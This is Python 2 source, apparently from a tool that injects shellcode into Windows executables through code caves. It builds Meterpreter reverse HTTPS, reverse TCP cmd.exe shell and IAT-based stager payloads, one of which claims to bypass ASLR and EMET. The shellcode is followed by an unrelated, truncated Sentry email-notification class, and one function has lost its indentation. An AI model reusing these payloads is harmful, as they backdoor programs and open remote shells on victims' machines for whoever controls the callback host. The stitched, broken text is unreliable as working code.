                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        #else:
        #    self.shellcode1 += "\x89\x00\x00\x00"
        self.shellcode1 += ("\x90" * 40
                            )
        self.shellcode2 = ("\x90" * 48
                           )
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
        return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
    def user_supplied_shellcode(self, flItms, CavesPicked={}):
        """
        This module allows for the user to provide a win32 raw/binary
        shellcode. For use with the -U flag. Make sure to use a process safe exit function.

        Wraps the supplied payload in the same thread-spawning stager used
        by reverse_tcp_stager, patching the payload length into the mov-esi
        size field.
        NOTE(review): the guard checks flItms['supplied_shellcode'] but the
        file is read from self.SUPPLIED_SHELLCODE — confirm these are always
        set together by the caller.
        """
        flItms['stager'] = True
        if flItms['supplied_shellcode'] is None:
            print "[!] User must provide shellcode for this module (-U)"
            return False
        else:
            self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
                           "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
                           "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
                           "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
                           "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
                           "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
                           "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
                           "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
                           "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
                           "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
                           "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
                           "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
                           "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
                           "\x5D\x90"
                           "\xBE")
        # size field: supplied payload length + 5-byte call stub
        self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
        self.shellcode1 += ("\x00\x00"
                            "\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
                            "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
                            "\x89\xF1"
                            )
        # optional jmp (\xe9 + rel32) across the cave gap, same math as
        # reverse_tcp_stager
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xeb\x44"  # <--length of shellcode below
        self.shellcode1 += "\x90\x5e"
        self.shellcode1 += ("\x90\x90\x90"
                            "\xF2\xA4"
                            "\xE8\x20\x00\x00"
                            "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
                            "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
                            "\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
                            "\x58\x58\x90\x61"
                            )
        # second cave-jump target for the tail of shellcode1
        breakupvar = eat_code_caves(flItms, 0, 2)
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3).rstrip("L")), 16))
        #else:
        #    self.shellcode1 += "\xEB\x06\x01\x00\x00"
        #Begin shellcode 2:
        # shellcode2 opens with a call (\xe8) back into shellcode1's copy loop
        breakupvar = eat_code_caves(flItms, 0, 1)
        if flItms['cave_jumping'] is True:
            self.shellcode2 = "\xe8"
            if breakupvar > 0:
                if len(self.shellcode2) < breakupvar:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
                                                   len(self.shellcode2) + 241).rstrip("L")), 16))
                else:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
                                                   breakupvar + 241).rstrip("L")), 16))
            else:
                self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
                                               len(self.shellcode2) + 234).rstrip("L")), 16))
        else:
            self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
        #Can inject any shellcode below.
        self.shellcode2 += self.supplied_shellcode
        # final jmp skipping over the embedded payload
        self.shellcode1 += "\xe9"
        self.shellcode1 += struct.pack("<I", len(self.shellcode2))
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
        return (self.stackpreserve + self.shellcode1, self.shellcode2)
    def meterpreter_reverse_https(self, flItms, CavesPicked={}):
        """
        Traditional meterpreter reverse https shellcode from metasploit
        modified to support cave jumping.

        flItms: dict of state about the binary being patched. Reads
            'cave_jumping' to decide whether the payload is split across
            code caves; sets flItms['stager'] = True.
        CavesPicked: mapping of chosen code caves (default unused here;
            cave distances come from eat_code_caves).

        Returns a tuple (stackpreserve + shellcode1, shellcode2) and also
        stores the full payload in self.shellcode. Returns False if
        self.PORT is not set. Requires self.HOST to be set.

        NOTE(review): the numeric constants below (361, 241, 234, the
        -3/-4 adjustments) are tied to the exact byte lengths of these
        stubs — confirm before editing any shellcode bytes.
        """
        if self.PORT is None:
            print ("Must provide port")
            return False
        flItms['stager'] = True
        # Distance between code caves 0 and 1 (used for jump offsets).
        breakupvar = eat_code_caves(flItms, 0, 1)
        #shellcode1 is the thread
        self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
                           "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
                           "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
                           "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
                           "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
                           "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
                           "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
                           "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
                           "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
                           "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
                           "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
                           "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
                           "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
                           "\x5D\x90"
                           )
        # mov esi, <size of shellcode2> (0xBE + imm32). The 16-bit pack
        # plus the two explicit NUL bytes below form the 4-byte immediate.
        self.shellcode1 += "\xBE"
        self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
        self.shellcode1 += "\x00\x00"  # <---Size of shellcode2 in hex
        self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
                            "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
                            "\x89\xF1"
                            )
        if flItms['cave_jumping'] is True:
            # E9 rel32: jump into the next code cave; the 4-byte offset is
            # derived from the cave distance minus the bytes emitted so far.
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                # Negative distance: wrap around via 0xffffffff (backward jump).
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xeb\x44"  # <--length of shellcode below
        self.shellcode1 += "\x90\x5e"
        self.shellcode1 += ("\x90\x90\x90"
                            "\xF2\xA4"
                            "\xE8\x20\x00\x00"
                            "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
                            "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
                            "\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
                            "\x58\x58\x90\x61"
                            )
        # Distance between code caves 0 and 2, for the second cave jump.
        breakupvar = eat_code_caves(flItms, 0, 2)
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3).rstrip("L")), 16))
        else:
            # No cave jumping: relative jump over shellcode2 instead.
            self.shellcode1 += "\xE9"
            self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
            self.shellcode1 += "\x00\x00"  # <---length shellcode2 + 5
        #Begin shellcode 2:
        breakupvar = eat_code_caves(flItms, 0, 1)
        if flItms['cave_jumping'] is True:
            # E8 rel32 call back toward shellcode1; 241/234 compensate for
            # the stub sizes on either side of the cave gap.
            self.shellcode2 = "\xe8"
            if breakupvar > 0:
                if len(self.shellcode2) < breakupvar:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
                                                   len(self.shellcode2) + 241).rstrip("L")), 16))
                else:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
                                                   breakupvar + 241).rstrip("L")), 16))
            else:
                self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
                                               len(self.shellcode2) + 234).rstrip("L")), 16))
        else:
            self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
        # Metasploit windows/meterpreter/reverse_https stager body.
        self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
                            "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
                            "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
                            "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
                            "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
                            "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
                            "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
                            "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
                            "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
                            "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
                            "\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
                            "\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
                            "\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
        # Callback port, little-endian 16-bit (followed by two NUL bytes).
        self.shellcode2 += struct.pack("<h", self.PORT)
        self.shellcode2 += ("\x00\x00\x53"
                            "\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
                            "\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
                            "\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
                            "\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
                            "\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
                            "\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
                            "\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
                            "\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
                            "\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
                            "\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
                            "\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
        # NUL-terminated callback host string.
        self.shellcode2 += self.HOST
        self.shellcode2 += "\x00"
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
        return (self.stackpreserve + self.shellcode1, self.shellcode2)
    def reverse_shell_tcp(self, flItms, CavesPicked={}):
        """
        Modified metasploit windows/shell_reverse_tcp shellcode
        to enable continued execution and cave jumping.

        flItms: dict of state about the binary being patched. Reads
            'cave_jumping' to decide whether the payload is split across
            code caves.
        CavesPicked: mapping of chosen code caves (unused directly here;
            cave distances come from eat_code_caves).

        Returns a tuple (stackpreserve + shellcode1,
        shellcode2 + stackrestore) and stores the full payload in
        self.shellcode. Returns False if self.PORT is not set.
        Requires self.pack_ip_addresses() to supply the callback IP.
        """
        if self.PORT is None:
            print ("Must provide port")
            return False
        #breakupvar is the distance between codecaves
        breakupvar = eat_code_caves(flItms, 0, 1)
        # FC (cld) + E8: the call's rel32 operand is either a cave jump
        # offset (below) or the stock 0x89 displacement of the stager.
        self.shellcode1 = "\xfc\xe8"
        if flItms['cave_jumping'] is True:
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                # Negative distance: wrap around via 0xffffffff (backward jump).
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\x89\x00\x00\x00"
        # Standard metasploit API-hashing block (find kernel32 exports).
        self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
                            "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
                            "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
                            "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
                            "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
                            "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
                            "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
                            "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
                            "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
                            "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
                            )
        # shellcode2: ws2_32 setup, connect-back, and cmd.exe process.
        self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
                           "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
                           "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
                           "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
                           "\x68"
                           )
        self.shellcode2 += self.pack_ip_addresses()  # IP
        self.shellcode2 += ("\x68\x02\x00")
        # Port is packed big-endian ('!h') as required by sockaddr_in.
        self.shellcode2 += struct.pack('!h', self.PORT)  # PORT
        self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
                            "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
                            "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
                            "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
                            "\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
                            #The NOP in the line below allows for continued execution.
                            "\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
                            "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
                            "\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
                            "\x81\xc4\xfc\x01\x00\x00"
                            )
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
        return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
return False
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
#### BEGIN ASLR BYPASS ####
# This works because we know the original entry point of the application and
# where we are supposed to be as we control where our shellcode goes
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below ebx
if flItms['NewCodeCave'] is True:
if 'CodeCaveVirtualAddress' in flItms:
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", (flItms['CodeCaveVirtualAddress'] +
len(self.shellcode1) +
len(self.stackpreserve) +
flItms['buffer'] + 201
)
)
else:
self.shellcode += '\x00x\x00\x00\x00'
else:
if flItms['CavesPicked'] == {}:
self.shellcode1 += '\x00\x00\x00\x00'
else:
for section in flItms['Sections']:
if section[0] == flItms['CavesPicked'][0][0]:
VirtualLOCofSection = section[2]
diskLOCofSection = section[4]
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", int(flItms['CavesPicked'][0][1], 16) -
diskLOCofSection +
VirtualLOCofSection +
flItms['ImageBase'] +
len(self.shellcode1) +
len(self.stackpreserve) +
9)
self.shellcode1 += "\xe8\x00\x00\x00\x00"
self.shellcode1 += "\x5e" # pop esi
self.shellcode1 += "\x2b\xf3" # sub esi,ebx
self.shellcode1 += "\x83\xfe\x00" # cmp esi,0
self.shellcode1 += "\xbb" # mov value below to EBX
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'])
self.shellcode1 += "\xb9" # mov value below to ECX
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'])
# Don't jump if in ASLR env
self.shellcode1 += "\x74\x15" # JZ (XX) # Jump to location after ALSR check
#Find the base addr
#Base address difference now in ESI
self.shellcode1 += "\xb8" # mov eax, Normal imagebase
self.shellcode1 += struct.pack("<I", flItms['ImageBase'])
self.shellcode1 += "\x03\xc6" # add eax, esi # NOW YOU HAVE ASLR IMAGEBASE in EAX
self.shellcode1 += "\xbb" # mov ebx, the loadlibA offset
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryAOffset'])
self.shellcode1 += "\xb9" # mov ecx, the getprocaddr offset
self.shellcode1 += struct.pack("<I", flItms['GetProcAddressOffset'])
self.shellcode1 += "\x03\xd8" # add ebx, eax #EBX will hold LoadlibAoffset
self.shellcode1 += "\x01\xc1" # add ecx, eax #ECX will hold Getprocaddress
####END ASLR BYPASS####
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
|
|
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.utils.html import escape, mark_safe
from sentry import options
from sentry.models import (
GroupSubscription, ProjectOption, UserAvatar, UserOption
)
from sentry.utils.avatar import get_email_avatar
from sentry.utils.email import MessageBuilder, group_id_to_email
from sentry.utils.http import absolute_uri
from sentry.utils.linksign import generate_signed_link
class ActivityEmail(object):
    """Base class for activity-driven notification emails.

    Subclasses supply get_description() (and typically
    get_activity_name()); this class handles participant resolution,
    context building, and delivery via MessageBuilder.
    """
    def __init__(self, activity):
        # Cache the related objects off the activity for convenient access.
        self.activity = activity
        self.group = activity.group
        self.project = activity.project
        self.organization = self.project.organization

    def _get_subject_prefix(self):
        """Per-project subject prefix, falling back to the global option."""
        configured = ProjectOption.objects.get_value(
            project=self.project,
            key='subject_prefix',
        )
        return configured or options.get('mail.subject-prefix')

    def should_email(self):
        """Hook for subclasses to suppress sending; defaults to True."""
        return True

    def get_participants(self):
        # TODO(dcramer): not used yet today except by Release's
        if not self.group:
            return []

        participants = set(GroupSubscription.objects.get_participants(
            group=self.group,
        ))

        actor = self.activity.user
        if actor is not None:
            # Drop the acting user unless they opted into notifications
            # about their own activity.
            wants_self_notifications = UserOption.objects.get_value(
                user=actor,
                project=None,
                key='self_notifications',
                default='0'
            ) == '1'
            if not wants_self_notifications:
                participants.discard(actor)

        return participants

    def get_template(self):
        """Plain-text template path."""
        return 'sentry/emails/activity/generic.txt'

    def get_html_template(self):
        """HTML template path."""
        return 'sentry/emails/activity/generic.html'

    def get_project_link(self):
        """Absolute URL of the project."""
        return absolute_uri('/{}/{}/'.format(
            self.organization.slug,
            self.project.slug,
        ))

    def get_group_link(self):
        """Absolute URL of the issue (group)."""
        return absolute_uri('/{}/{}/issues/{}/'.format(
            self.organization.slug,
            self.project.slug,
            self.group.id,
        ))

    def get_base_context(self):
        """Template context shared by all activity emails."""
        activity = self.activity
        context = {
            'data': activity.data,
            'author': activity.user,
            'project': self.project,
            'project_link': self.get_project_link(),
        }
        if activity.group:
            context.update(self.get_group_context())
        return context

    def get_group_context(self):
        """Extra context for activities attached to a group."""
        link = self.get_group_link()
        return {
            'group': self.group,
            'link': link,
            'activity_link': '{}activity/'.format(link),
        }

    def get_email_type(self):
        return 'notify.activity.{}'.format(
            self.activity.get_type_display(),
        )

    def get_subject(self):
        group = self.group
        level = group.get_level_display().upper()
        return u'[%s] %s: %s' % (
            self.project.get_full_name(),
            level,
            group.message_short,
        )

    def get_context(self):
        # get_description() may return a bare description, a
        # (description, params) pair, or a (description, params,
        # html_params) triple; the nested unpack handles all three.
        description = self.get_description()
        try:
            description, params, html_params = description
        except ValueError:
            try:
                description, params = description
                html_params = params
            except ValueError:
                params, html_params = {}, {}

        return {
            'activity_name': self.get_activity_name(),
            'text_description': self.description_as_text(description, params),
            'html_description': self.description_as_html(description, html_params),
        }

    def get_headers(self):
        """SMTP headers identifying the team/project (and group, if any)."""
        headers = {
            'X-Sentry-Team': self.project.team.slug,
            'X-Sentry-Project': self.project.slug,
        }

        group = self.group
        if group:
            headers['X-Sentry-Logger'] = group.logger
            headers['X-Sentry-Logger-Level'] = group.get_level_display()
            headers['X-Sentry-Reply-To'] = group_id_to_email(group.id)

        return headers

    def get_description(self):
        """Subclasses must return the activity description (see get_context)."""
        raise NotImplementedError

    def avatar_as_html(self):
        user = self.activity.user
        if not user:
            # System-generated activity gets the Sentry avatar placeholder.
            return '<span class="avatar sentry"></span>'

        avatar_type = user.get_avatar_type()
        if avatar_type == 'upload':
            return '<img class="avatar" src="{}" />'.format(
                escape(self._get_user_avatar_url(user)))

        # Letter avatars render initials; anything else falls back to
        # gravatar (the final boolean argument).
        use_gravatar = avatar_type != 'letter_avatar'
        return get_email_avatar(
            user.get_display_name(), user.get_label(), 20, use_gravatar)

    def _get_user_avatar_url(self, user, size=20):
        """URL of the user's uploaded avatar, or '' if none exists."""
        try:
            avatar = UserAvatar.objects.get(user=user)
        except UserAvatar.DoesNotExist:
            return ''

